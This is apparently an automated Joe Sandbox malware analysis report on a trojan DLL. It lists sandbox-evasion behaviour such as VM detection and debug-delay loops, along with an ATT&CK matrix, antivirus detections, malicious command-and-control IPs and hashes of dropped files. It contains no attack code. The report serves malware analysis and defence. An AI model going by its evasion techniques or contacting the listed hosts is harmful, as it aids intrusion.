Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion:

Tries to delay execution (extensive OutputDebugStringW loop)

Show sources

Source: C:\Windows\System32\loaddll32.exe

Section loaded: OutputDebugStringW count: 1594

Source: C:\Windows\System32\loaddll32.exe

Window / User API: threadDelayed 1594

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EC70730 GetTokenInformation,GetSystemInfo,GetTokenInformation,

0_2_6EC70730

Source: Amcache.hve.6.dr	Binary or memory string: VMware
Source: Amcache.hve.6.dr	Binary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual USB Mouse
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Devicehbin
Source: Amcache.hve.6.dr	Binary or memory string: Microsoft Hyper-V Generation Counter
Source: Amcache.hve.6.dr	Binary or memory string: VMware7,1
Source: Amcache.hve.6.dr	Binary or memory string: NECVMWar VMware SATA CD00
Source: Amcache.hve.6.dr	Binary or memory string: VMware Virtual disk SCSI Disk Device
Source: Amcache.hve.6.dr	Binary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.13989454.B64.1906190538,BiosReleaseDate:06/19/2019,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
Source: WerFault.exe, 00000006.00000002.333232466.0000000004C4B000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000002.333084314.0000000004C10000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.327130247.0000000004C4B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW
Source: Amcache.hve.6.dr	Binary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
Source: Amcache.hve.6.dr	Binary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
Source: Amcache.hve.6.dr	Binary or memory string: VMware, Inc.me
Source: Amcache.hve.6.dr	Binary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
Source: Amcache.hve.6.dr	Binary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
Source: WerFault.exe, 00000006.00000002.333232466.0000000004C4B000.00000004.00000001.sdmp, WerFault.exe, 00000006.00000003.327130247.0000000004C4B000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAWS Packet Scheduler-0000
Source: Amcache.hve.6.dr	Binary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000

Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EC66D0C GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6EC66D0C

Source: C:\Windows\System32\loaddll32.exe

Code function: 0_2_6EC73138 RtlAddVectoredExceptionHandler,

0_2_6EC73138

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe "C:\Users\user\Desktop\Pv3ZsGsdfS.dll",#1

Jump to behavior

Source: loaddll32.exe, 00000000.00000002.817211374.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.299018461.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.297349737.0000000003290000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: loaddll32.exe, 00000000.00000002.817211374.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.299018461.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.297349737.0000000003290000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: loaddll32.exe, 00000000.00000002.817211374.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.299018461.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.297349737.0000000003290000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: loaddll32.exe, 00000000.00000002.817211374.0000000001250000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.299018461.0000000003290000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.297349737.0000000003290000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Source: C:\Windows\System32\loaddll32.exe

Code function: GetUserNameW,MessageBoxW,GetLastError,CreateFileA,DebugBreak,FlushFileBuffers,FreeEnvironmentStringsA,GetConsoleOutputCP,GetEnvironmentStrings,GetLocaleInfoA,GetStartupInfoA,GetStringTypeA,HeapValidate,IsBadReadPtr,LCMapStringA,LoadLibraryA,OutputDebugStringA,

0_2_6EC66D0C

Source: C:\Windows\System32\loaddll32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Windows\System32\loaddll32.exe

0_2_6EC66D0C

Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: c:\users\user\desktop\procexp.exe
Source: Amcache.hve.6.dr	Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.6.dr, Amcache.hve.LOG1.6.dr	Binary or memory string: procexp.exe

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Windows Management Instrumentation	Path Interception	Process Injection12	Virtualization/Sandbox Evasion11	OS Credential Dumping	Security Software Discovery31	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Scheduled Task/Job	Boot or Logon Initialization Scripts	Boot or Logon Initialization Scripts	Process Injection12	LSASS Memory	Virtualization/Sandbox Evasion11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Application Layer Protocol1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Obfuscated Files or Information1	Security Account Manager	Process Discovery1	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Steganography	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Rundll321	NTDS	Application Window Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Protocol Impersonation	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Software Packing	LSA Secrets	Account Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Steganography	Cached Domain Credentials	System Owner/User Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Compile After Delivery	DCSync	Remote System Discovery1	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	System Information Discovery13	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
Pv3ZsGsdfS.dll	30%	Virustotal		Browse
Pv3ZsGsdfS.dll	35%	ReversingLabs	Win32.Trojan.BotX

Dropped Files

No Antivirus matches

Unpacked PE Files

Source	Detection	Scanner	Label	Download
3.0.rundll32.exe.6ec60000.5.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.6ec60000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.0.rundll32.exe.780000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.0.rundll32.exe.780000.3.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
0.2.loaddll32.exe.6ec60000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
0.2.loaddll32.exe.630000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File
3.2.rundll32.exe.6ec60000.2.unpack	100%	Avira	HEUR/AGEN.1144420	Download File
3.2.rundll32.exe.780000.0.unpack	100%	Avira	TR/Crypt.XPACK.Gen	Download File

Domains

No Antivirus matches

URLs

Source	Detection	Scanner	Label	Link
http://www.baxleystamps.comDVarFileInfo$	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

No contacted domains info

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://upx.sf.net	Amcache.hve.6.dr	false		high
http://www.baxleystamps.comDVarFileInfo$	loaddll32.exe, 00000000.00000002.817479037.000000006EC7F000.00000002.00020000.sdmp, rundll32.exe, 00000003.00000000.297548303.000000006EC7F000.00000002.00020000.sdmp	false	Avira URL Cloud: safe	low

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
185.4.135.27	unknown	Greece	199246	TOPHOSTGR	true
85.10.248.28	unknown	Germany	24940	HETZNER-ASDE	true
80.211.3.13	unknown	Italy	31034	ARUBA-ASNIT	true
144.91.122.102	unknown	Germany	51167	CONTABODE	true

General Information

Joe Sandbox Version:	34.0.0 Boulder Opal
Analysis ID:	544850
Start date:	24.12.2021
Start time:	09:13:23
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 18s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	Pv3ZsGsdfS.dll
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	21
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal76.troj.evad.winDLL@6/6@0/4
EGA Information:	Failed
HDC Information:	Successful, ratio: 100% (good quality ratio 96.1%) Quality average: 78.4% Quality standard deviation: 27.1%
HCA Information:	Failed
Cookbook Comments:	Adjust boot time Enable AMSI Found application associated with file extension: .dll Override analysis time to 240s for rundll32
Warnings:	Show All Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WerFault.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe Excluded IPs from analysis (whitelisted): 20.189.173.20 Excluded domains from analysis (whitelisted): ris.api.iris.microsoft.com, login.live.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus15.westus.cloudapp.azure.com, ctldl.windowsupdate.com, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, watson.telemetry.microsoft.com, arc.msn.com Not all processes where analyzed, report is missing behavior information

Simulations

Behavior and APIs

Time	Type	Description
09:14:36	API Interceptor	1x Sleep call for process: WerFault.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link
185.4.135.27	Results12232021.xls	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
85.10.248.28	Results12232021.xls	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse
	triage_dropped_file.dll	Get hash	malicious	Browse

Domains

No context

ASN

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
TOPHOSTGR	Results12232021.xls	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.10228.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware2.28165.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.19171.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.ML.PE-A+Troj.Dridex-AJA.21147.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.BehavesLike.Win32.Drixed.hc.23689.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.26365.dll	Get hash	malicious	Browse	185.4.135.27
	SecuriteInfo.com.W32.AIDetect.malware1.11362.dll	Get hash	malicious	Browse	185.4.135.27
	triage_dropped_file.dll	Get hash	malicious	Browse	185.4.135.27
HETZNER-ASDE	arm-20211224-0726	Get hash	malicious	Browse	188.40.179.187
	u3pwH2rdhh.dll	Get hash	malicious	Browse	178.63.25.185
	sD38AZFcDx.dll	Get hash	malicious	Browse	178.63.25.185
	B0163915087099500.xls	Get hash	malicious	Browse	178.63.25.185
	9zTQue8p66	Get hash	malicious	Browse	95.217.252.209
	u3pwH2rdhh.dll	Get hash	malicious	Browse	178.63.25.185
	sD38AZFcDx.dll	Get hash	malicious	Browse	178.63.25.185
	iCxt7GTqSx.exe	Get hash	malicious	Browse	116.202.14.219
	S6624380012007761509.xls	Get hash	malicious	Browse	178.63.25.185
	3hHVPfLM8k.xls	Get hash	malicious	Browse	178.63.25.185
	HL6DTimRMC.xls	Get hash	malicious	Browse	178.63.25.185
	jSVSCeiXfz.xls	Get hash	malicious	Browse	178.63.25.185
	FkpslFZF5N.xls	Get hash	malicious	Browse	178.63.25.185
	SecuriteInfo.com.Trojan.MulDropNET.43.22262.exe	Get hash	malicious	Browse	148.251.234.83
	y7U1OWRhCC.xls	Get hash	malicious	Browse	178.63.25.185
	lF6Ej6Qgsa.xls	Get hash	malicious	Browse	178.63.25.185
	QiOR3R3sps.xls	Get hash	malicious	Browse	178.63.25.185
	m4AbQMQFCO	Get hash	malicious	Browse	159.69.251.216
	QrZ46isOwd.xls	Get hash	malicious	Browse	178.63.25.185
	KjSQTdoNCu.xls	Get hash	malicious	Browse	178.63.25.185

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_rundll32.exe_20f54535b4fc1ad4777e2f126bb0718bcd6544b5_82810a17_13ded830\Report.wer Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	65536
Entropy (8bit):	0.9111718068746235
Encrypted:	false
SSDEEP:	192:sBpxip0oXp/HBUZMX4jed+y/u7snS274ItWc:sJiHXp/BUZMX4jef/u7snX4ItWc
MD5:	98DB725A67C1B8A5B6180CEE5CAE23C5
SHA1:	13EDF737166203F780F919FD7504AF39C248C91C
SHA-256:	0B8587EBDE8B9CDF286B2424F2491CCBF835F66F6B9389F2702176969AE970DB
SHA-512:	ED0DD5F37DB7B47CB5F273394DFBFC1449D9A599C3CC810FECEFF5199D6FED2502166ABCB986D788282F53B7F3A810F522C98C940DF0AADB060F6440BBFE31E5
Malicious:	false
Reputation:	low
Preview:	..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.A.P.P.C.R.A.S.H.....E.v.e.n.t.T.i.m.e.=.1.3.2.8.4.8.3.9.6.6.8.3.0.9.5.0.5.8.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.2.8.4.8.3.9.6.7.3.7.6.2.6.1.5.7.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.e.c.3.c.1.7.d.5.-.b.9.b.8.-.4.4.7.6.-.8.b.2.8.-.d.7.d.d.3.e.0.0.5.e.a.5.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.9.d.a.1.9.7.1.8.-.5.9.e.a.-.4.b.4.2.-.a.b.1.a.-.a.7.f.9.5.7.9.f.6.d.3.1.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.r.u.n.d.l.l.3.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.R.U.N.D.L.L.3.2...E.X.E.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.1.8.c.-.0.0.0.1.-.0.0.1.c.-.6.3.b.f.-.b.7.b.0.e.9.f.8.d.7.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.0.f.5.1.9.f.e.e.c.4.8.6.d.e.8.7.e.d.7.3.c.b.9.2.d.3.c.a.c.8.0.2.4.0.0.0.0.0.0.0.0.!.0.0.0.0.b.c.c.5.d.c.3.2.2.2.0.3.4.d.3.f.2.5.7.f.1.f.d.3.5.8.8.9.e.5.b.e.9.0.f.0.9.

C:\ProgramData\Microsoft\Windows\WER\Temp\WER420B.tmp.dmp Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Fri Dec 24 17:14:30 2021, 0x1205a4 type
Category:	dropped
Size (bytes):	39588
Entropy (8bit):	2.203119864197164
Encrypted:	false
SSDEEP:	192:8ni3B0pH4WvIO5Skbh+D2kJ9Cv1jyPnM:eeNy5Lbg2kJ9g1j+M
MD5:	79CC52BA1F0EDD26262D136E990D6984
SHA1:	E46079188D61F35B4E3D3ADFF6732DA30DB98E52
SHA-256:	DC0508215AACCF947F0B30DCEDF4E964DDF68C4E875EC363791270DCC51349F0
SHA-512:	ECEE6A6521EF416E8DF4A4FD436D0C0CC050CC9EF1C34E16BB400A111451880DB1C7F20CFCC8B2548067651F983C160E4542997B7F96A69B1C6DC1A69B5F0E68
Malicious:	false
Reputation:	low
Preview:	MDMP....... ..........a............d...............l...........r*..........T.......8...........T...........................l...........X....................................................................U...........B..............GenuineIntelW...........T..............a.............................0..=...............P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4C9B.tmp.WERInternalMetadata.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Little-endian UTF-16 Unicode text, with CRLF line terminators
Category:	dropped
Size (bytes):	8262
Entropy (8bit):	3.691032691100008
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNi2j06G6Y5DJ6qgmfT6mS1CprY89bvzsfTFm:RrlsNiY06G6YtJ6qgmfT6mSYvYf8
MD5:	C87774744C9A5569A446F9BF33806F1E
SHA1:	3A66302FCC41E42BA718CCC8758A62A18163BC33
SHA-256:	511D0E9184E6E0C5BF06F83A2F9357D9C459A09CF7495F307FB657BFB6082BDA
SHA-512:	0381662D0F431B2547FDD12323994EDB80B58A91EE78362A1D4488CDA073CA4274B7E3B05144F0BAFEB51812DA6DC8877BF302C17B82BDB6BDC91834EAED84AB
Malicious:	false
Reputation:	low
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.4.9.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER4EEE.tmp.xml Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4630
Entropy (8bit):	4.462909015903191
Encrypted:	false
SSDEEP:	48:cvIwSD8zsmtJgtWI9WAq6WSC8BYIa8fm8M4JCdsfi2hFfkHx+q8/08KBh4SrSRd:uITfK0aSNK0JpiZR58ODWRd
MD5:	31E7146B51BA7ED555179C77D3D1E3E7
SHA1:	FEED34F987DE4DC45B91EF062770E97122CCDE9B
SHA-256:	54F8D3359514FC8938C97263E2F3541F2B53B73A7BF329CFA4B7ACA811CAECC5
SHA-512:	347D73C81E080CF89EB5A34CF3F6F41791B3DEC515DB77E0298081A44180D729284519D0279904FD6CC8024A3900DFB85F2E20AB3FA01766C8F03817D6D9D859
Malicious:	false
Reputation:	low
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1311985" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Windows\appcompat\Programs\Amcache.hve Download File
Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.27745692143549
Encrypted:	false
SSDEEP:	12288:WTL1SAyOjLbq2EXipqU8s7DfJtHpKx9pYJwD4kAmtKPABK8JizStKX:uL1SAyOjLbq2EX8O
MD5:	B92BBD7D35F32F74D0898172B4E83114
SHA1:	30DADB66C00264F0D67F842D94E81403083A27F9
SHA-256:	97E33CBE253502A16CACAF286E2D77C2CFD250C50BB718BE5D95D8048CB52B81
SHA-512:	29C3F3BD7DBA05BFB647D749E3929C01C66F4AA7E3411F3163A98BB3F4461DFCE217D9551DE1EA3091060A4E6E63BB3A52503536407C4789E762C3C6180CF4E2
Malicious:	false
Reputation:	low
Preview:	regfZ...Z...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.bX..................................................................................................................................................................................................................................................................................................................................................)\.........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1 Download File
